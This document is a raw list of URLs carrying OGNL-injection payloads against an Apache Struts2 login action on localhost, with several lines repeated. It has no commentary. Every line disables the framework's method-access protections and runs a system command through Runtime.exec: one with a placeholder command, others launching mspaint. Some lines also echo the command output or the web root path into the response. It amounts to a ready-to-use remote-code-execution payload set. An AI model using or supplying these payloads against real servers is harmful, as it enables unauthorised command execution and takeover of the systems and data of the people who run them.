http://127.0.0.1/Userinfo-login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("系统命令")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
http://127.0.0.1/Userinfo-login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("mspaint")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
http://127.0.0.1/Userinfo-login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'mspaint\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
http://127.0.0.1/Userinfo-login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43x\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43x\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43x.getWriter().println(\43req.getRealPath("\u005c"))')(d))&(i99)(('\43x.getWriter().close()')(d))
http://127.0.0.1/Userinfo-login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("mspaint")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
http://127.0.0.1/Userinfo-login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'mspaint\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
http://127.0.0.1/Userinfo-login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43x\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43x\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43x.getWriter().println(\43req.getRealPath("\u005c"))')(d))&(i99)(('\43x.getWriter().close()')(d))